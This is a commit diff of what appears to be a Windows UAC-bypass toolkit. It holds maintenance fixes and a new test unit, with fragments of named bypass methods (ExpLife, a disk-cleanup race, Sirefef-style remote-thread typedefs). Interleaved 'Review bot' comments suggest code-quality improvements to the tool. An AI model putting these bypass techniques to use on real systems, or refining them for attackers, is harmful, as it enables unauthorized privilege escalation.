Mostly maintenance with bug fixes, yuubari updated for 15048
hfiref0x 2017-03-08 13:51:38 +07:00
parent bd5ee4d820
commit 25aae12bb7
47 changed files with 690 additions and 165 deletions

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -4,9 +4,9 @@
*
* TITLE: COMET.H
*
* VERSION: 2.52
* VERSION: 2.57
*
* DATE: 17 Jan 2017
* DATE: 07 Mar 2017
*
* Prototypes and definitions for Comet method.
*
@ -19,5 +19,5 @@
#pragma once
BOOL ucmCometMethod(
LPWSTR lpszPayload
_In_ LPWSTR lpszPayload
);


@ -4,9 +4,9 @@
*
* TITLE: COMPRESS.C
*
* VERSION: 2.56
* VERSION: 2.57
*
* DATE: 15 Feb 2017
* DATE: 01 Mar 2017
*
* Compression support.
*
@ -75,6 +75,12 @@ PUCHAR DecompressBufferLZNT1(
PUCHAR UncompBuffer = NULL;
NTSTATUS status;
if (FinalUncompressedSize)
*FinalUncompressedSize = 0;
if (UncompressedBufferSize == 0)
return NULL;
UncompBuffer = (PUCHAR)VirtualAlloc(NULL, UncompressedBufferSize,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
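Review bot: The new early exits in DecompressBufferLZNT1 change the failure contract, but nothing in the visible lines documents it. The function header should say that a zero `UncompressedBufferSize` returns NULL, and that `*FinalUncompressedSize` is reset to 0 before any work is done. It should also state who releases the buffer: the visible lines obtain it with `VirtualAlloc`, so presumably the caller must use `VirtualFree(ptr, 0, MEM_RELEASE)`. The function body continues outside this hunk, so the remaining failure paths cannot be checked from here.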


@ -4,7 +4,7 @@
*
* TITLE: ENIGMA0X3.C
*
* VERSION: 2.54
* VERSION: 2.57
*
* DATE: 07 Feb 2017
*
@ -256,10 +256,11 @@ BOOL ucmDiskCleanupRaceCondition(
shinfo.lpParameters = T_SCHTASKS_CMD;
shinfo.nShow = SW_SHOW;
if (ShellExecuteExW(&shinfo)) {
if (shinfo.hProcess)
if (shinfo.hProcess != NULL) {
WaitForSingleObject(shinfo.hProcess, INFINITE);
CloseHandle(shinfo.hProcess);
}
}
//
// Because cleanmgr.exe is slow we need to wait enough time until it will try to launch dismhost.exe
// It may happen very fast or really slow depending on resources usage.


@ -4,9 +4,9 @@
*
* TITLE: EXPLIFE.C
*
* VERSION: 2.56
* VERSION: 2.57
*
* DATE: 14 Feb 2017
* DATE: 07 Mar 2017
*
* ExpLife UAC bypass using IARPUninstallStringLauncher.
* For description please visit original URL
@ -100,7 +100,7 @@ BOOL ucmUninstallLauncherMethod(
break;
_strcpy(szKeyName, L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
StringFromGUID2(&guid, szGuid, sizeof(szGuid));
if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {
_strcat(szKeyName, szGuid);
lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
@ -116,6 +116,7 @@ BOOL ucmUninstallLauncherMethod(
break;
bResult = ucmMasqueradedAPRLaunchFile(szGuid);
}
} while (bCond);


@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
* VERSION: 2.55
* VERSION: 2.57
*
* DATE: 10 Feb 2017
* DATE: 28 Feb 2017
*
* Common header file for the program support routines.
*
@ -79,6 +79,9 @@ typedef enum _UACBYPASSMETHOD {
UacMethodEnigma0x3,
UacMethodEnigma0x3_2,
UacMethodExpLife,
#ifdef _DEBUG
UacMethodTest,
#endif
UacMethodMax
} UACBYPASSMETHOD;
@ -101,6 +104,7 @@ typedef enum _UACBYPASSMETHOD {
#include "hybrids.h"
#include "comet.h"
#include "enigma0x3.h"
#include "tests\test.h"
//default execution flow
#define AKAGI_FLAG_KILO 0
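Review bot: `#include "tests\test.h"` is added unconditionally, although `UacMethodTest` and its `case` in ucmMain exist only under `_DEBUG`. The Akagi project file also adds `tests\test.c` as a `ClCompile` item for every configuration, so the test routine and the `ITestInterface` typedefs are compiled into Release builds where nothing can call them. Guard the include with `#ifdef _DEBUG` … `#endif`, and either wrap the body of test.c the same way or make the `ClCompile` item conditional on the Debug configuration. That keeps debug-only scaffolding out of shipped binaries and out of the release analysis run.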


@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
* VERSION: 2.56
* VERSION: 2.57
*
* DATE: 15 Feb 2017
* DATE: 01 Mar 2017
*
* Hybrid UAC bypass methods.
*
@ -1197,12 +1197,18 @@ BOOL ucmSetupAkagiLink(
lpUser = _filename(usKey.Buffer);
ParentRoot.Buffer = NULL;
ParentRoot.Length = 0;
ParentRoot.MaximumLength = 0;
RtlInitUnicodeString(&ParentRoot, L"\\Rpc Control\\Akagi");
InitializeObjectAttributes(&attr, &ParentRoot, OBJ_CASE_INSENSITIVE, 0, NULL);
status = NtCreateDirectoryObject(&hRoot, DIRECTORY_CREATE_SUBDIRECTORY, &attr);
if (!NT_SUCCESS(status))
break;
ChildName.Buffer = NULL;
ChildName.Length = 0;
ChildName.MaximumLength = 0;
RtlInitUnicodeString(&ChildName, lpUser);
attr.RootDirectory = hRoot;
attr.ObjectName = &ChildName;
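Review bot: The three assignments that zero `ParentRoot`, and later `ChildName`, directly before `RtlInitUnicodeString` are redundant, because that routine writes Buffer, Length and MaximumLength itself. If they exist to quiet a code-analysis warning after the switch to AllRules.ruleset, say so in a comment such as `// pre-zeroed for static analysis; RtlInitUnicodeString overwrites every field`. Alternatively use the single call `RtlSecureZeroMemory(&ParentRoot, sizeof(ParentRoot));`, as tests/test.c does for `sname`, so the file has one idiom. The same pattern appears for `DllName` in the Ikazuchi DLLMAIN.C section. ucmSetupAkagiLink starts and ends outside this hunk.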


@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 2.56
* VERSION: 2.57
*
* DATE: 13 Feb 2017
* DATE: 28 Feb 2017
*
* Program entry point.
*
@ -850,6 +850,11 @@ UINT ucmMain()
return ERROR_SUCCESS;
}
break;
#ifdef _DEBUG
case UacMethodTest:
UACMeTest();
break;
#endif
}
return ERROR_ACCESS_DENIED;
@ -902,6 +907,7 @@ VOID main()
uctx.ucmMain = (pfnEntryPoint)ucmMain;
RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);
#pragma warning(suppress: 28159)
k = ~GetTickCount();
g_ExCookie = RtlRandomEx(&k);
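Review bot: The added `#pragma warning(suppress: 28159)` in main() has no explanation, and neither does `#pragma warning(suppress: 28301)` in the SIREFEF.H section. A suppression with no stated reason is hard to tell apart from one that hides a real finding once the rule set is AllRules. Put a one-line reason beside each, for example `// 28159: GetTickCount wrap-around is irrelevant, the value only seeds RtlRandomEx`. For SIREFEF.H the comment should name the diagnostic and say why the typedef cannot be annotated instead. main() continues outside this hunk.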


@ -4,9 +4,9 @@
*
* TITLE: SIREFEF.H
*
* VERSION: 2.53
* VERSION: 2.57
*
* DATE: 18 Jan 2017
* DATE: 01 Mar 2017
*
* Prototypes and definitions for Sirefef/ZeroAccess method.
*
@ -57,6 +57,7 @@ typedef HANDLE(NTAPI *pfnCreateRemoteThread)(
_Out_opt_ LPDWORD lpThreadId
);
#pragma warning(suppress: 28301)
typedef DWORD(WINAPI *pfnWaitForSingleObject)(
_In_ HANDLE hHandle,
_In_ DWORD dwMilliseconds

190
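--- /dev/null
+++ b/Source/Akagi/tests/test.c
@@ -0,0 +1,190 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: TEST.C
+*
+* VERSION: 2.57
+*
+* DATE: 28 Feb 2017
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+#define T_REGISTRY_USER L"\\REGISTRY\\USER\\"
+#define REGISTRY_USER_LENGTH sizeof(T_REGISTRY_USER) - sizeof(WCHAR)
+#define T_AKAGI_KEY L"Software\\Akagi"
+#define AKAGI_KEY_LENGTH sizeof(T_AKAGI_KEY) - sizeof(WCHAR)
+typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
+typedef struct _OBJSCANPARAM {
+PWSTR Buffer;
+SIZE_T BufferSize;
+} OBJSCANPARAM, *POBJSCANPARAM;
+/*
+* supEnumSystemObjects
+*
+* Purpose:
+*
+* Lookup object by name in given directory.
+*
+*/
+NTSTATUS NTAPI supEnumSystemObjects(
+_In_opt_ LPWSTR pwszRootDirectory,
+_In_opt_ HANDLE hRootDirectory,
+_In_ PENUMOBJECTSCALLBACK CallbackProc,
+_In_opt_ PVOID CallbackParam
+)
+{
+BOOL cond = TRUE;
+ULONG ctx, rlen;
+HANDLE hDirectory = NULL;
+NTSTATUS status;
+NTSTATUS CallbackStatus;
+OBJECT_ATTRIBUTES attr;
+UNICODE_STRING sname;
+POBJECT_DIRECTORY_INFORMATION objinf;
+if (CallbackProc == NULL) {
+return STATUS_INVALID_PARAMETER_4;
+}
+status = STATUS_UNSUCCESSFUL;
+// We can use root directory.
+if (pwszRootDirectory != NULL) {
+RtlSecureZeroMemory(&sname, sizeof(sname));
+RtlInitUnicodeString(&sname, pwszRootDirectory);
+InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
+status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
+if (!NT_SUCCESS(status)) {
+return status;
+}
+}
+else {
+if (hRootDirectory == NULL) {
+return STATUS_INVALID_PARAMETER_2;
+}
+hDirectory = hRootDirectory;
+}
+// Enumerate objects in directory.
+ctx = 0;
+do {
+rlen = 0;
+status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
+if (status != STATUS_BUFFER_TOO_SMALL)
+break;
+objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
+if (objinf == NULL)
+break;
+status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
+if (!NT_SUCCESS(status)) {
+RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
+break;
+}
+CallbackStatus = CallbackProc(objinf, CallbackParam);
+RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf);
+if (NT_SUCCESS(CallbackStatus)) {
+status = STATUS_SUCCESS;
+break;
+}
+} while (cond);
+if (hDirectory != NULL) {
+NtClose(hDirectory);
+}
+return status;
+}
+/*
+* supDetectObjectCallback
+*
+* Purpose:
+*
+* Comparer callback routine used in objects enumeration.
+*
+*/
+NTSTATUS NTAPI supDetectObjectCallback(
+_In_ POBJECT_DIRECTORY_INFORMATION Entry,
+_In_ PVOID CallbackParam
+)
+{
+SIZE_T BufferSize;
+POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
+if (Entry == NULL) {
+return STATUS_INVALID_PARAMETER_1;
+}
+if (CallbackParam == NULL) {
+return STATUS_INVALID_PARAMETER_2;
+}
+if (Entry->Name.Buffer) {
+BufferSize = Entry->Name.Length + sizeof(UNICODE_NULL);
+Param->Buffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, BufferSize);
+if (Param->Buffer) {
+Param->BufferSize = BufferSize;
+_strncpy(
+Param->Buffer, Param->BufferSize / sizeof(WCHAR),
+Entry->Name.Buffer, Entry->Name.Length / sizeof(WCHAR)
+);
+return STATUS_SUCCESS;
+}
+}
+return STATUS_UNSUCCESSFUL;
+}
+VOID UACMeTest()
+{
+OBJSCANPARAM Param;
+NTSTATUS status;
+LPWSTR lpszParamKey = NULL;
+SIZE_T memIO;
+ucmSetupAkagiLink();
+Param.Buffer = NULL;
+Param.BufferSize = 0;
+status = supEnumSystemObjects(L"\\Rpc Control\\Akagi", NULL,
+supDetectObjectCallback, &Param);
+if (!NT_SUCCESS(status))
+return;
+if ((Param.Buffer == NULL) || (Param.BufferSize == 0))
+return;
+memIO = MAX_PATH + Param.BufferSize + REGISTRY_USER_LENGTH + AKAGI_KEY_LENGTH;
+lpszParamKey = RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY, memIO);
+if (lpszParamKey == NULL)
+return;
+_strcpy_w(lpszParamKey, T_REGISTRY_USER);
+_strcat_w(lpszParamKey, Param.Buffer);
+_strcat_w(lpszParamKey, L"\\");
+_strcat_w(lpszParamKey, T_AKAGI_KEY);
+}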
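Review bot: supEnumSystemObjects closes a handle it does not own. When `pwszRootDirectory` is NULL it copies the caller's `hRootDirectory` into `hDirectory`, and the unconditional `NtClose(hDirectory)` at the end then closes the caller's handle; the close should be limited to the handle opened here, `if ((pwszRootDirectory != NULL) && (hDirectory != NULL)) NtClose(hDirectory);`. The only caller in this file passes a path, so the defect is latent, but the helper is duplicated in the Ikazuchi DLL. UACMeTest also leaks both heap blocks: `Param.Buffer`, allocated inside supDetectObjectCallback, is never released on the `lpszParamKey == NULL` return or at the end, and `lpszParamKey` is built and then dropped. Add `RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Param.Buffer);` on both paths and `RtlFreeHeap(GetProcessHeap(), 0, lpszParamKey);` before the final return.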

95
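--- /dev/null
+++ b/Source/Akagi/tests/test.h
@@ -0,0 +1,95 @@
+#/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: TEST.H
+*
+* VERSION: 2.57
+*
+* DATE: 28 Feb 2017
+*
+* Test unit header file.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+typedef interface ITestInterface ITestInterface;
+typedef struct ITestInterfaceVtbl {
+BEGIN_INTERFACE
+HRESULT(STDMETHODCALLTYPE *QueryInterface)(
+__RPC__in ITestInterface * This,
+__RPC__in REFIID riid,
+_COM_Outptr_ void **ppvObject);
+ULONG(STDMETHODCALLTYPE *AddRef)(
+__RPC__in ITestInterface * This);
+ULONG(STDMETHODCALLTYPE *Release)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method1)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method2)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method3)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method4)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method5)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method6)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method7)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method8)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method9)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method10)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method11)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method12)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method13)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method14)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method15)(
+__RPC__in ITestInterface * This);
+HRESULT(STDMETHODCALLTYPE *Method16)(
+__RPC__in ITestInterface * This);
+END_INTERFACE
+} *PITestInterfaceVtbl;
+interface ITestInterface
+{
+CONST_VTBL struct ITestInterfaceVtbl *lpVtbl;
+};
+VOID UACMeTest();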
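Review bot: The header opens with `#/****…`, where the leading `#` forms a null preprocessor directive in front of the banner comment. It compiles, but it reads as a typo and should be removed. `VOID UACMeTest();` declares a function with unspecified parameters in C, so write `VOID UACMeTest(VOID);` here and in the definition in test.c to let the compiler reject stray arguments. `ITestInterface` and its sixteen `MethodN` slots are not referenced by test.c in this commit; add a short comment stating their purpose or leave them out until they are used.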


@ -85,7 +85,7 @@
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<TargetName>$(ProjectName)32</TargetName>
<RunCodeAnalysis>true</RunCodeAnalysis>
</PropertyGroup>
@ -94,7 +94,7 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>true</RunCodeAnalysis>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
@ -106,6 +106,7 @@
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<EnablePREfast>false</EnablePREfast>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -132,6 +133,7 @@
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<EnablePREfast>false</EnablePREfast>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -167,6 +169,7 @@
<StringPooling>
</StringPooling>
<IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -207,6 +210,7 @@
<StringPooling>
</StringPooling>
<IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -258,6 +262,7 @@
<ClCompile Include="pitou.c" />
<ClCompile Include="simda.c" />
<ClCompile Include="sup.c" />
<ClCompile Include="tests\test.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\shared\minirtl.h" />
@ -280,6 +285,7 @@
<ClInclude Include="simda.h" />
<ClInclude Include="sirefef.h" />
<ClInclude Include="sup.h" />
<ClInclude Include="tests\test.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="bin32res.rc">


@ -16,6 +16,9 @@
<Filter Include="minirtl">
<UniqueIdentifier>{1caf2f34-af91-46be-aa2e-1893b0be628c}</UniqueIdentifier>
</Filter>
<Filter Include="testunits">
<UniqueIdentifier>{c4fc1dcf-e216-4458-a377-e7203d627128}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
@ -99,6 +102,9 @@
<ClCompile Include="..\Shared\ultohex.c">
<Filter>minirtl</Filter>
</ClCompile>
<ClCompile Include="tests\test.c">
<Filter>testunits</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="global.h">
@ -161,6 +167,9 @@
<ClInclude Include="..\Shared\_filename.h">
<Filter>minirtl</Filter>
</ClInclude>
<ClInclude Include="tests\test.h">
<Filter>testunits</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Resource.rc">


@ -1,19 +1,19 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LocalDebuggerCommandArguments>4</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>28</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>10</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>28</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LocalDebuggerCommandArguments>26</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>22</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>16</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>22</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>


@ -74,6 +74,7 @@
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<TargetName>$(ProjectName)32</TargetName>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
@ -81,20 +82,23 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<GenerateManifest>true</GenerateManifest>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<TargetName>$(ProjectName)32</TargetName>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -112,6 +116,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CreateHotpatchableImage>false</CreateHotpatchableImage>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -135,6 +140,7 @@
</MultiProcessorCompilation>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -163,6 +169,7 @@
<CreateHotpatchableImage>false</CreateHotpatchableImage>
<CompileAs>CompileAsC</CompileAs>
<DebugInformationFormat>None</DebugInformationFormat>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -178,6 +185,9 @@
<GenerateDebugInformation>No</GenerateDebugInformation>
<LinkTimeCodeGeneration>UseLinkTimeCodeGeneration</LinkTimeCodeGeneration>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Fubuki32.dll</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -193,6 +203,7 @@
<StringPooling>true</StringPooling>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -205,6 +216,9 @@
<ModuleDefinitionFile>export.def</ModuleDefinitionFile>
<AdditionalDependencies>Shell32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Fubuki64.dll</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\shared\_strcat.c" />
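Review bot: The new `PostBuildEvent` runs `\Utils\StripDebug.exe` through a root-relative path, which resolves against the root of whatever drive the build runs on rather than against the checkout. A Release build therefore executes whichever binary sits at that location on the build machine, and fails on a clean clone where it is absent. If the tool ships with the repository, anchor and quote the path, for example `"$(SolutionDir)Utils\StripDebug.exe" "$(TargetPath)"`. That also replaces the hard-coded `Fubuki32.dll` and `Fubuki64.dll` names. The same command form is added to the Release configurations of the Hibiki project and of the next DLL project on this page.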


@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
* VERSION: 2.53
* VERSION: 2.57
*
* DATE: 18 Jan 2017
* DATE: 03 Mar 2017
*
* Proxy dll entry point, Fubuki Kai Ni.
*
@ -29,9 +29,9 @@
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include <windows.h>
#include "..\Shared\ntos.h"
#include "shared\ntos.h"
#include <ntstatus.h>
#include "..\shared\minirtl.h"
#include "shared\minirtl.h"
#include "unbcl.h"
#include "wbemcomn.h"

Binary file not shown.


@ -72,6 +72,7 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
@ -79,22 +80,25 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>true</RunCodeAnalysis>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>true</RunCodeAnalysis>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -105,6 +109,7 @@
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;HIBIKI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -114,6 +119,10 @@
<EntryPointSymbol>DllMain</EntryPointSymbol>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
</Link>
<Manifest>
<AdditionalManifestFiles>
</AdditionalManifestFiles>
</Manifest>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
@ -124,6 +133,7 @@
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;HIBIKI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -133,6 +143,10 @@
<EntryPointSymbol>DllMain</EntryPointSymbol>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
</Link>
<Manifest>
<AdditionalManifestFiles>
</AdditionalManifestFiles>
</Manifest>
</ItemDefinitionGroup>
